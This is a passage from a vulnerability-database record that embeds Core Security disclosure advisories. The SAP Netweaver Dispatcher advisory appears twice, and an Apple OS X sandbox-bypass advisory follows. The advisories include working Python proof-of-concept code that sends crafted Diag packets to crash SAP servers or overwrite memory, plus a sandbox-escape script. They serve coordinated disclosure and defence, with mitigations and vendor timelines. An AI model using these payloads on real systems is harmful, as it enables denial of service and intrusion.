send_packet(sock, diagheader + step + message + eom)\r\n\r\n# Connect and send initialization packet\r\nconnection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nconnection.connect((options.hostname, options.port))\r\ninitialize(connection)\r\nreceive(connection) \r\n\r\n-----/\r\n In the following subsections, we give the python code that can be added\r\nafter the script above in order to reproduce all vulnerabilities.\r\n\r\n\r\n8.1. *SAP Netweaver DiagTraceR3Info Vulnerability*\r\n\r\n[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver\r\n'disp+work.exe' module process a specially crafted network packet.\r\nMalicious packets are processed by the vulnerable function\r\n'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace\r\nis configured at levels 2 or 3 for the "Dialog processor" component of\r\nthe "Dialog" work process handling the packet [2]. This vulnerability\r\ncould allow a remote unauthenticated attacker to execute arbitrary code\r\nwith the privileges of the user running the "Dispatcher" service. The\r\nfollowing python code can be used to trigger the vulnerability:\r\n\r\n/-----\r\ncrash = "X"*114 + "\\xff\\xff" # --> Unicode Address to call !\r\ncrash+= "Y"*32\r\ncrash = "\\x10\\x06\\x20" + struct.pack("!H", len(crash)) + crash\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n8.2. *SAP Netweaver DiagTraceHex Denial of Service Vulnerability*\r\n\r\n[CVE-2011-1517] The vulnerability can be triggered by sending a\r\nspecially crafted network packet to the vulnerable function\r\n'DiagTraceHex' in the 'disp+work.exe'. This vulnerability could allow a\r\nremote unauthenticated attacker to conduct a denial of service attack\r\nagainst the vulnerable systems. The following python code can be used to\r\ntrigger the vulnerability:\r\n\r\n/-----\r\ncrash = "\\x12\\x04\\x18\\xff\\xff\\xff\\xffCrash!"\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n8.3. *SAP Netweaver DiagTraceAtoms Denial of Service Vulnerability*\r\n\r\n[CVE-2012-2511] The vulnerability can be triggered by sending a\r\nspecially crafted network packet to the vulnerable function\r\n'DiagTraceAtoms'. This vulnerability could allow a remote\r\nunauthenticated attacker to conduct a denial of service attack. The\r\nfollowing python code can be used to trigger the vulnerability:\r\n\r\n/-----\r\ncrash = "\\x12\\x09\\x02\\x00\\x00\\x00\\x08" + "\\x80"*8\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n8.4. *SAP Netweaver DiagTraceStreamI Denial of Service Vulnerability*\r\n\r\n[CVE-2012-2512] The vulnerability can be triggered by sending a\r\nspecially crafted network packet to the vulnerable function\r\n'DiagTraceStreamI' and could allow a remote unauthenticated attacker to\r\nconduct a denial of service attack.\r\n\r\n/-----\r\ncrash = "\\x10\\x13\\x09\\x00\\xFF\\x12\\x1A\\x59\\x51"\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n8.5. *SAP Netweaver Diaginput Denial of Service Vulnerability*\r\n\r\n[CVE-2012-2513] The vulnerability can be triggered by the vulnerable\r\nfunction 'Diaginput', allowing a denial of service attack against the\r\nvulnerable systems.\r\n\r\n/-----\r\ncrash = "\\x10\\x0c\\x0e\\x00\\0a" + "A"*10\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n8.6. *SAP Netweaver DiagiEventSource Denial of Service Vulnerability*\r\n\r\n[CVE-2012-2514] The vulnerability can be triggered by the vulnerable\r\nfunction 'DiagiEventSource' in the 'disp+work.exe' module. This\r\nvulnerability could allow a remote unauthenticated attacker to conduct a\r\ndenial of service attack.\r\n\r\n/-----\r\ncrash = "\\x10\\x0f\\x01\\x00\\x11" + "A"*17\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2012-01-24:\r\nCore Security Technologies notifies the SAP team of the vulnerability,\r\nsetting the estimated publication date of the advisory for February\r\n21st, 2012.\r\n\r\n. 2012-01-24:\r\nCore sends an advisory draft with technical details.\r\n\r\n. 2012-01-24:\r\nThe SAP team confirms the reception of the issue and asks to use the\r\nsecurity ID 582820-2012 for further communication. SAP also notifies its\r\nterms and conditions [3], and asks for Core to commit to that guideline.\r\n\r\n. 2012-02-01:\r\nThe Core Advisories Team communicates that it has its own guidelines for\r\nthe advisories publication process, which may conflict with SAP's\r\nguidelines. In particular, Core does not guarantee that the publication\r\nof the advisory will be postponed until a fix or patch is made available\r\nby SAP. If information about this vulnerability is partially or\r\ncompletely leaked by a third party, the advisory would be released\r\nimmediately as forced release. Despite this, the Core team commits to\r\ncomply with SAP's guidelines as much as possible.\r\n\r\n. 2012-02-21:\r\nFirst release date missed.\r\n\r\n. 2012-02-22:\r\nCore asks for the status of the fix and notifies that the release date\r\nwas missed.\r\n\r\n. 2012-02-23:\r\nSAP notifies that, because the development team has to downport the\r\nsolutions for a huge bunch of software releases, the earliest release\r\ndate for the patches would be May 8th 2012.\r\n\r\n. 2012-02-23:\r\nCore re-schedules the advisory publication to May 8th.\r\n\r\n. 2012-04-16:\r\nCore asks if the patching process is still on track to release patches\r\non May 8th and requests a status of the fix.\r\n\r\n. 2012-04-16:\r\nVendor notifies that the release date is still planned for May 8th, but\r\ndue to quality control processes this date cannot be guaranteed.\r\n\r\n. 2012-05-04:\r\nCore notifies that everything is ready for publication and requests the\r\nvendor to confirm the release date and the list of affected platforms\r\n(no reply received).\r\n\r\n. 2012-05-07:\r\nCore asks again for the status of the fix.\r\n\r\n. 2012-05-08:\r\nSAP notifies that they have released the security note 1687910 [4] on\r\nMay Patch Day 2012 and asks to include that information in [Sec. 6]. SAP\r\nalso requests Core to remove all the technical information researched by\r\nMartin Gallo in [Sec. 8].\r\n\r\n. 2012-05-08:\r\nCore replies that the reporting of vulnerabilities is aimed at helping\r\nvulnerable users to understand and address the issues; the advisory will\r\nthus be released with the technical information.\r\n\r\n. 2012-05-08:\r\nAdvisory CORE-2012-0123 published.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] http://www.sap.com/platform/netweaver/index.epx\r\n[2]\r\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm\r\n[3] SAP's legal information, terms and conditions\r\nhttp://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46.\r\n\r\n[4] SAP security note 1687910\r\nhttps://service.sap.com/sap/support/notes/1687910.\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2012 Core Security\r\nTechnologies and (c) 2012 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\n ", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-72871"}, {"lastseen": "2017-11-19T14:29:11", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "sap netweaver dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1516", "CVE-2011-1517", "CVE-2012-2511", "CVE-2012-2512", "CVE-2012-2513", "CVE-2012-2514", "CVE-2012-2611", "CVE-2012-2612"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-74568", "id": "SSV:74568", "sourceData": "\n 1. Advisory Information\r\nTitle: SAP Netweaver Dispatcher Multiple Vulnerabilities\r\nAdvisory ID: CORE-2012-0123\r\nAdvisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities\r\nDate published: 2012-05-08\r\nDate of last update: 2012-05-10\r\nVendors contacted: SAP\r\nRelease mode: Coordinated release\r\n\r\n2. Vulnerability Information\r\nClass: Buffer overflow [CWE-119]\r\nImpact: Code execution, Denial of service\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2012-2611, CVE-2012-2612, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514\r\n\r\n3. Vulnerability Description\r\nSAP Netweaver [1] is a technology platform for building and integrating SAP business applications. Multiple vulnerabilities have been found in SAP Netweaver that could allow an unauthenticated, remote attacker to execute arbitrary code and lead to denial of service conditions. The vulnerabilities are triggered sending specially crafted SAP Diag packets to remote TCP port 32NN (being NN the SAP system number) of a host running the "Dispatcher" service, part of SAP Netweaver Application Server ABAP. By sending different messages, the different vulnerabilities can be triggered.\r\n\r\n4. Vulnerable packages\r\nSAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313).\r\nSAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869).\r\nOlder versions are probably affected too, but they were not checked.\r\n5. Non-vulnerable packages\r\nVendor did not provide this information.\r\n6. Vendor Information, Solutions and Workarounds\r\nSAP released the security note 1687910 regarding these issues. Contact SAP for further information.\r\n\r\nMartin Gallo proposed the following actions to mitigate the impact of the vulnerabilities:\r\n\r\nDisable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2012-2611], [CVE-2012-2612], [CVE-2012-2511] and [CVE-2012-2512]).\r\nRestrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities).\r\nRestrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2012-2611], [CVE-2012-2612], [CVE-2012-2511] and [CVE-2012-2512]).\r\n7. Credits\r\nThese vulnerabilities were discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Security Advisories Team .\r\n\r\n8. Technical Description / Proof of Concept Code\r\nNOTE: (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2012-2611], [CVE-2012-2612], [CVE-2012-2511] and [CVE-2012-2512]).\r\n\r\nThe following python script can be used to reproduce the vulnerabilities described below:\r\n\r\nimport socket, struct\r\nfrom optparse import OptionParser\r\n\r\n# Parse the target options\r\nparser = OptionParser()\r\nparser.add_option("-l", "--hostname", dest="hostname", help="Hostname", default="localhost")\r\nparser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200)\r\n(options, args) = parser.parse_args()\r\n\r\ndef send_packet(sock, packet):\r\n\tpacket = struct.pack("!I", len(packet)) + packet\r\n\tsock.send(packet)\r\n\r\ndef receive(sock):\r\n\tlength = sock.recv(4)\r\n\t(length, ) = struct.unpack("!I", length)\r\n\tdata = ""\r\n\twhile len(data)<length:\r\n\t\tdata+= sock.recv(length)\r\n\treturn (length, data)\r\n\r\ndef initialize(sock):\r\n\tdiagheader = "\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\tuser_connect = "\\x10\\x04\\x02\\x00\\x0c\\x00\\x00\\x00\\xc8\\x00\\x00\\x04\\x4c\\x00\\x00\\x0b\\xb8"\r\n\tsupport_data = "\\x10\\x04\\x0b\\x00\\x20"\r\n\tsupport_data+= "\\xff\\x7f\\xfa\\x0d\\x78\\xb7\\x37\\xde\\xf6\\x19\\x6e\\x93\\x25\\xbf\\x15\\x93"\r\n\tsupport_data+= "\\xef\\x73\\xfe\\xeb\\xdb\\x51\\xed\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\tdpheader = "\\xff\\xff\\xff\\xff\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff"\r\n\tdpheader+= struct.pack("I", len(diagheader + user_connect + support_data))\r\n\tdpheader+= "\\x00\\xff\\xff\\xff\\xff\\xff\\xff"\r\n\tdpheader+= "terminalXXXXXXX"\r\n\tdpheader+= "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\tsend_packet(sock, dpheader + diagheader + user_connect + support_data)\r\n\r\ndef send_message(sock, message):\r\n\tdiagheader = "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n\tstep = "\\x10\\x04\\x26\\x00\\x04\\x00\\x00\\x00\\x01"\r\n\teom = "\\x0c"\r\n\tsend_packet(sock, diagheader + step + message + eom)\r\n\r\n# Connect and send initialization packet\r\nconnection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nconnection.connect((options.hostname, options.port))\r\ninitialize(connection)\r\nreceive(connection)\r\n\r\n# Choose one of the following and comment the others\r\n\r\n#[CVE-2012-2611] \r\ncrash = "X"*114 + "\\xff\\xff" # --> Unicode Address to call !\r\ncrash+= "Y"*32\r\ncrash = "\\x10\\x06\\x20" + struct.pack("!H", len(crash)) + crash\r\nsend_message(connection, crash)\r\n\r\n#[CVE-2012-2612] \r\ncrash = "\\x12\\x04\\x18\\xff\\xff\\xff\\xffCrash!"\r\nsend_message(connection, crash)\r\n\r\n#[CVE-2012-2511]\r\ncrash = "\\x12\\x09\\x02\\x00\\x00\\x00\\x08" + "\\x80"*8\r\nsend_message(connection, crash)\r\n\r\n#[CVE-2012-2512] \r\ncrash = "\\x10\\x13\\x09\\x00\\xFF\\x12\\x1A\\x59\\x51"\r\nsend_message(connection, crash)\r\n\r\n#[CVE-2012-2513]\r\ncrash = "\\x10\\x0c\\x0e\\x00\\0a" + "A"*10\r\nsend_message(connection, crash)\r\n\r\n#[CVE-2012-2514]\r\ncrash = "\\x10\\x0f\\x01\\x00\\x11" + "A"*17\r\nsend_message(connection, crash)\r\n\r\nIn the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities.\r\n\r\n8.1. SAP Netweaver DiagTraceR3Info Vulnerability\r\n[CVE-2012-2611] The vulnerability can be triggered when SAP Netweaver disp+work.exe module process a specially crafted network packet. Malicious packets are processed by the vulnerable function DiagTraceR3Info in the disp+work.exe module when the Developer Trace is configured at levels 2 or 3 for the "Dialog processor" component of the "Dialog" work process handling the packet [2]. This vulnerability could allow a remote unauthenticated attacker to execute arbitrary code with the privileges of the user running the "Dispatcher" service. The following python code can be used to trigger the vulnerability:\r\n\r\n\r\ncrash = "X"*114 + "\\xff\\xff" # --> Unicode Address to call !\r\ncrash+= "Y"*32\r\ncrash = "\\x10\\x06\\x20" + struct.pack("!H", len(crash)) + crash\r\nsend_message(connection, crash)\r\n\r\n8.2. SAP Netweaver DiagTraceHex Denial Of Service Vulnerability\r\n[CVE-2012-2612] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function DiagTraceHex in the disp+work.exe. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following python code can be used to trigger the vulnerability:\r\n\r\n\r\ncrash = "\\x12\\x04\\x18\\xff\\xff\\xff\\xffCrash!"\r\nsend_message(connection, crash)\r\n\r\n8.3. SAP Netweaver DiagTraceAtoms Denial Of Service Vulnerability\r\n[CVE-2012-2511] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function DiagTraceAtoms. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. The following python code can be used to trigger the vulnerability:\r\n\r\n\r\ncrash = "\\x12\\x09\\x02\\x00\\x00\\x00\\x08" + "\\x80"*8\r\nsend_message(connection, crash)\r\n\r\n8.4. SAP Netweaver DiagTraceStreamI Denial Of Service Vulnerability\r\n[CVE-2012-2512] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function DiagTraceStreamI and could allow a remote unauthenticated attacker to conduct a denial of service attack.\r\n\r\n\r\ncrash = "\\x10\\x13\\x09\\x00\\xFF\\x12\\x1A\\x59\\x51"\r\nsend_message(connection, crash)\r\n\r\n8.5. SAP Netweaver Diaginput Denial Of Service Vulnerability\r\n[CVE-2012-2513] The vulnerability can be triggered by the vulnerable function Diaginput, allowing a denial of service attack against the vulnerable systems.\r\n\r\n\r\ncrash = "\\x10\\x0c\\x0e\\x00\\0a" + "A"*10\r\nsend_message(connection, crash)\r\n\r\n8.6. SAP Netweaver DiagiEventSource Denial Of Service Vulnerability\r\n[CVE-2012-2514] The vulnerability can be triggered by the vulnerable function DiagiEventSource in the disp+work.exe module. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack.\r\n\r\n\r\ncrash = "\\x10\\x0f\\x01\\x00\\x11" + "A"*17\r\nsend_message(connection, crash)\r\n\r\n9. Report Timeline\r\n2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012.\r\n2012-01-24: Core sends an advisory draft with technical details.\r\n2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline.\r\n2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible.\r\n2012-02-21: First release date missed.\r\n2012-02-22: Core asks for the status of the fix and notifies that the release date was missed.\r\n2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012.\r\n2012-02-23: Core re-schedules the advisory publication to May 8th.\r\n2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix.\r\n2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed.\r\n2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received).\r\n2012-05-07: Core asks again for the status of the fix.\r\n2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8].\r\n2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information.\r\n2012-05-08: Advisory CORE-2012-0123 published.\r\n2012-05-10: ERRATA: CVE-2011-1516 changed to CVE-2012-2611. CVE-2011-1517 changed to CVE-2012-2612.\r\n10. References\r\n[1] http://www.sap.com/platform/netweaver/index.epx\r\n[2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm\r\n[3] SAP's legal information, terms and conditions \r\nhttp://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. \r\n[4] SAP security note 1687910 \r\nhttps://service.sap.com/sap/support/notes/1687910. \r\n\r\n11. About CoreLabs\r\nCoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.\r\n\r\n12. About Core Security Technologies\r\nCore Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.\r\n\r\n13. Disclaimer\r\nThe contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n14. PGP/GPG Keys\r\nThis advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-74568"}, {"lastseen": "2017-11-19T17:58:01", "description": "No description provided by source.", "published": "2011-11-11T00:00:00", "title": "Apple OS X Sandbox Predefined Profiles Bypass", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1516"], "modified": "2011-11-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-23189", "id": "SSV:23189", "sourceData": "\n Apple OS X Sandbox Predefined Profiles Bypass\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Apple OS X Sandbox Predefined Profiles Bypass\r\nAdvisory ID: CORE-2011-0919\r\nAdvisory URL: http://www.coresecurity.com/content/apple-osx-sandbox-bypass\r\nDate published: 2011-11-10\r\nDate of last update: 2011-11-10\r\nVendors contacted: Apple\r\nRelease mode: User release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Access control failure [CWE-264]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2011-1516\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nSeveral of the default pre-defined sandbox profiles don't properly\r\nlimit all the available mechanisms and therefore allow exercising part\r\nof the restricted functionality. Namely, sending Apple events is\r\npossible within the no-network sandbox (kSBXProfileNoNetwork). A\r\ncompromised application hypothetically restricted by the use of the\r\nno-network profile may have access to network resources through the\r\nuse of Apple events to invoke the execution of other applications not\r\ndirectly restricted by the sandbox.\r\n\r\nIt is worth mentioning that a similar issue was reported by Charlie\r\nMiller in his talk at Black Hat Japan 2008 [2]. He mentioned a few\r\nprocesses sandboxed by default as well as a method to circumvent the\r\nprotection. Sometime after the talk, Apple modified the mentioned\r\nprofiles by restricting the use of Apple events but did not modify the\r\ngeneric profiles.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . Apple Mac OS X 10.7.x\r\n . Apple Mac OS X 10.6.x\r\n . Apple Mac OS X 10.5.x\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . Apple Mac OS X 10.4\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nContact the vendor for more information.\r\n\r\n\r\n7. *Credits*\r\n\r\nThis vulnerability was discovered and researched by Anibal Sacco and\r\nMatias Eissler from Core Security Technologies. The publication of\r\nthis advisory was coordinated by Carlos Sarraute.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\nThe use of Apple events is possible within the several default\r\nprofiles as no-network, no-internet (kSBXProfileNoNetwork,\r\nkSBXProfileNoInternet) and others. A compromised application\r\nhypothetically restricted by the use of the no-network profile may\r\nhave access to network resources through the use of Apple events to\r\ninvoke the execution of other applications not directly restricted by\r\nthe sandbox.\r\n\r\nAs Apple's "App Sandbox Design Guide" document points out,\r\napplications that require sending Apple events to other arbitrary\r\napplications are not suitable for sandboxing, because some developer\r\ntools restrict Apple events by default while defining the sandbox. The\r\nreason for this is that, as we show here, by dispatching Apple events\r\na process can escape the sandbox [1].\r\n\r\nThe method used by Charlie Miller involves dropping a script to the\r\ndisk and getting it executed by launchd via launchctl. Our approach is\r\ntechnically the same without the need to drop a file. In our PoC we\r\nused "osascript" to send the required Apple events to launchd in order\r\nto execute the new process. As the new process is not a 'child' of the\r\nsandboxed process, it is created without the sandbox restrictions.\r\n\r\nAn additional risk with these profiles is that they are supposed to\r\nprovide an example of how a process should be restricted in different\r\nscenarios. If the no-network profile allows Apple-script events, this\r\nmay result in new applications using the same restriction rules,\r\ntherefore offering a false sense of security.\r\n\r\nThe following PoC illustrates this vulnerability:\r\n\r\n/-----\r\nimport os\r\nimport sys\r\nimport socket\r\n\r\nif len(sys.argv) != 2:\r\n print "[-] Usage: sandbox-exec -n no-network python %s hostname" %\r\nsys.argv[0]\r\n\r\ntry:\r\n targetIP = sys.argv[1]\r\n s = socket.socket()\r\n s.connect((targetIP, 80))\r\n s.send('GET /\\r\\n\\r\\n')\r\n print(s.recv(1024))\r\n print "\\n\\n\\n[+] Sandbox escaped"\r\n\r\nexcept Exception, e:\r\n if "Operation not permitted" in str(e): #print repr(e)\r\n print "[-] Blocked by seatbelt"\r\n print "[ ] Escaping..."\r\n os.system("""/usr/bin/osascript -e 'tell application\r\n"Terminal" to do script "python %s %s"'""" % (sys.argv[0], targetIP))\r\n\r\n- -----/\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2011-09-20:\r\nCore Security Technologies notifies Apple Product Security of the\r\nvulnerability, including technical details. Preliminary publication\r\ndate is set to November 7, 2011.\r\n\r\n. 2010-09-20:\r\nVendor acknowledges the receipt of the information.\r\n\r\n. 2010-10-05:\r\nVendor informs that it does not see any actual security implications.\r\nThe kSBXProfileNoNetwork sandbox profile does not promise that Apple\r\nEvents will be blocked in the documentation. (Specifically, all it\r\nguarantees is "all sockets-based networking is prohibited".)\r\n\r\n. 2011-10-13:\r\nCore responds that the kSBXProfileNoNetwork sandbox profile should\r\nguarantee that "all sockets-based networking is prohibited". The PoC\r\nsent to Apple shows that through the use of Apple events (osascript is\r\nused in the PoC just to keep it simple) an attacker could circumvent\r\nthe restriction. So, at the end, sockets-based networking is used.\r\n\r\n. 2010-10-18:\r\nVendor responds that it is currently considering modifying its\r\ndocumentation to explicitly point out what Core described; namely,\r\nthat the restrictions that these particular sandbox profiles provide\r\nare limited to the process in which the sandbox is applied.\r\n\r\n. 2011-11-10:\r\nThe advisory CORE-2011-0919 is published as user release.\r\n\r\n\r\n10. *References*\r\n\r\n[1] App Sandbox Design Guide -- Designing for App Sandbox\r\nhttp://developer.apple.com/library/mac/#documentation/Security/Conceptual/AppSandboxDesignGuide/DesigningYourSandbox/DesigningYourSandbox.html\r\n\r\n[2] Charlie Miller, "Hacking OS X", Black Hat Japan 2008\r\nhttps://www.blackhat.com/presentations/bh-jp-08/bh-jp-08-Miller/BlackHat-Japan-08-Miller-Hacking-OSX.pdf\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is\r\ncharged with anticipating the future needs and requirements for\r\ninformation security technologies. We conduct our research in several\r\nimportant areas of computer security including system vulnerabilities,\r\ncyber attack planning and simulation, source code auditing, and\r\ncryptography. Our results include problem formalization,\r\nidentification of vulnerabilities, novel solutions and prototypes for\r\nnew technologies. CoreLabs regularly publishes security advisories,\r\ntechnical papers, project information and shared software tools for\r\npublic use at: http://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of\r\nthreats with security test and measurement solutions that continuously\r\nidentify and demonstrate real-world exposures to their most critical\r\nassets. Our customers can gain real visibility into their security\r\nstanding, real validation of their security controls, and real metrics\r\nto more effectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2011 Core Security\r\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\n ", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-23189"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:46", "description": "\nSAP NetWeaver Dispatcher - Multiple Vulnerabilities", "edition": 1, "published": 